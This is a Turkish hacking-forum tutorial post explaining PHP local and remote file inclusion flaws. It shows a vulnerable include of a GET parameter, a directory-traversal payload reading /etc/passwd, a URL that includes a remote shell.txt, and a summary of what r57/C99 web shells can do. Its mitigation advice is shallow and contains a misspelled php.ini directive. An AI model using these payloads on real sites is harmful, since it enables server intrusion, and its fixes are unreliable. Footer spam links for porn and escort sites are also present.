KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Php'de RFI ve LFI Açıkları
Konu : Php'de RFI ve LFI Açıkları - 03.02.2015, 00:19
Mesaj: #1
Burada sizlere PHP web programlama dilinde meydana gelen RFI ve LFI açıklıklarından bahsedicem. Php kod yazar bu açıklar nasıl meydana geliyor? etkileri nedir ve nelerle sonuçlanır bunları inceleyeceğiz.[b]File Inclusion dosya ekleme olarak tabir edilebilen bir zayıflıktır. File Inclusion saldırıları, PHP web yazılım dilinde karşılaşılan bir güvenlik açığıdır. Kötü niyetli saldırganın, yerel(local) ve uzaktan(remote) kod çalıştırmasına olanak sağlar.

LFI (Local File Inclusion) : Yerelden dosya ekleyerek kod çalıştırmaktır.
RFI (Remote File Inclusion) : Uzaktan dosya ekleyerek kod çalıştırmaktır.


PHP web programlama dili ile kodlanmış uygulamalarda, yazılımcıların tanımladıkları değişkene değer atamaması veya atanan değerlerin filtrelenmemesinden kaynaklanmaktadır. Aşağıdaki örnek kod satırları ile detayları uygulamalı olarak inceleyelim;

LFI (Local File Inclusion) Örneği
index.php dosyası: <?php include($_GET[’sayfa’]) ?>

Bu gibi bağlantılar içeren bir web sitesinde aşağıdaki gibi bağlantı istekleri oluşturulur:
index.php?sayfa=haberler.php
index.php?sayfa=iletisim.php

En basit görünümüyle böyle bir yazılım,LFI (Local File Inclusion) zayıflığını oluşturur:

index.php?sayfa=../../../../../../../../../etc/passwd
Yukarıdaki“../”ifadesi bulunduğu dizinden bir üst dizine çıkmayı sağlar ve sucunun /etc/passwd içeriğini yani user listesini ekrana yazdırır:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh …..


RFI (Remote File Inclusion) Örneği
index2.php dosyası:
include(“$duyurular/guncel/duyuru.php”);
Bu satırdaki “$” işareti bulunan paramtreden doğan hatalı kodlama ile uzaktan dosya çağırmak mümkündür.
http://www.hedef.com/index2.php?duyu...com/shell.txt?
Yukarıdaki şekilde, Linklerin Görülmesine İzin Verilmiyor. Üye Ol ya da Giriş Yap adresinde bulunan zararlı kodlar Linklerin Görülmesine İzin Verilmiyor. Üye Ol ya da Giriş Yap adresi üzerinde çalıştırılacaktır.


Bu noktada saldırgan yönlendirilen alanda shell ve listparch isimleriyle tabir edilen kötü amaçlı scriptçikleri kullanarak web sitenin sunucusuna sızmaktadır! Böylelikle sunucu üzerinde istenilen işlemleri gerçekleştirebilmektedir. Bunların en çok kullanılanları r57, C99 ve veryasyonlarıdır…

Mesela R57 Shell’inin özelliklerine bir değinelim…
R57 web üzerinde komut çalıştırma, dizin atlama, dosya düzenleme, yeni dosya oluşturma, dosya çalıştırma, veritabanına bağlanma&bağlantıları görme, dosya içeriği okuma, dosya yükleme ve dosya indirme vs.. özellikleriyle sunucu üzerinde yetkisiz olarak birçok işlev gerçekleştirmektedir.

Sql veritabanına bağlantı kurabilir, veritabanını dışarı aktarabilir ve belirtilen veritabanı üzerine sql komutları çalıştırabilir. Bu özelliği ile hedef sitenin veritabanı bilgilerini barındıran dosyayı dışarı aktarabilir ve sql komutlarıyla istenilen diğer işlemelr yapılabilir.
Özellikle hosting firmalarının çok fazla siteyi aynı sunucuda barındırdığını düşünürsek herhangi bir sitede güvenlik açığı olması durumunda o sunucu üzerinde bulunan tüm web siteleri ve sunucu tehlike altındadır.

– KORUNMA –

Yöntem 1
Yazılan kodların RFI açıklarına karşı kontrol edilmesi.

Zayıf Kod:
<?php include ($ornek. ‘../index.php’); ?>

Güvenli Kod:
<?php $ornek= ‘veri’; include ($ornek. ‘../index.php’); ?>

Örnek:değişkenine tanımlama yapıldığından dış verinin girişine izin vermeyecek ve [b]RFI & LFI açıklarından korunmamaızı sağlayacaktır.[/b]

Yöntem 2
php.ini /etc/php.inidosyasının içini açarak disable_function değerinin yanına aşağıda belirtilen özellikleri yazarak web shell scriptçiklerinin etkisiz kalmaları sağlanabilir:
disable_function = system, passthru, exec, popen, proc_close, proc_get_status, proc_nice, proc_open, allow_url_fopen, shell, shellexec, executeservice

İnş faydalı olur.

Yararlı olduysam ne mutlu bana İmage Kolay gelsin
[/b]

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno